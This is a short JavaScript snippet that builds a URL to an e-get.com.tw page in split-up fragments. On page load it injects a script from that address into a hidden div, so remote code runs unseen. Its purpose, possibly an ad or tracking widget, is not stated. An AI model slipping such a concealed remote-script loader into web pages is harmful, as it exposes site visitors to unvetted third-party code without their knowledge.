function setyweget() {
   var theurl = "http://ww";
   theurl = theurl + "w.e-";
   theurl = theurl + "get.c";
   theurl = theurl + "om.tw";
    theurl = theurl + "/ind";
    theurl = theurl + "ex.p";
    theurl = theurl + "hp?u";
    theurl = theurl + "=37&";
    theurl = theurl + "s=ck";
    document.write('<div id="yweget" style="visibility: hidden;"></div>');
    var yweget = document.getElementById('yweget');
    script = document.createElement('script');
    script.src = theurl;
    script.setAttribute('charset','utf-8');
    script.type = 'text/javascript';
    script.id = 'ywegetloadScript';
    yweget.appendChild(script);
}
setyweget();
